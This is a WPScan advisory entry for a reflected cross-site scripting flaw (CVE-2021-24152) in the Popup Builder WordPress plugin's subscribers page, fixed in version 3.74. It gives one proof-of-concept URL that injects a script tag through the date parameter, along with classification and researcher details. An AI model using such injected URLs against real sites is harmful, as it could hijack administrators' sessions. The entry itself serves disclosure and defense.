WordPress Plugin Vulnerabilities

Popup Builder < 3.74 - Authenticated Reflected Cross-Site Scripting (XSS)

Description

The "All Subscribers" setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.

Proof of Concept

http://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscribers-date=%22%3E%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E

Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg

Affects Plugins

popup-builder

Fixed in version 3.74

References

CVE

CVE-2021-24152

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)

Submitter

Nguyen Anh Tien

Submitter website

https://research.sun-asterisk.com/

Submitter twitter

vigov5

Verified

Yes

WPVDB ID

597e9686-f4e2-43bf-85ef-c5967e5652bd

Timeline

Publicly Published

2021-02-02 (about 2 years ago)

Added

2021-02-02 (about 2 years ago)

Last Updated

2021-02-03 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin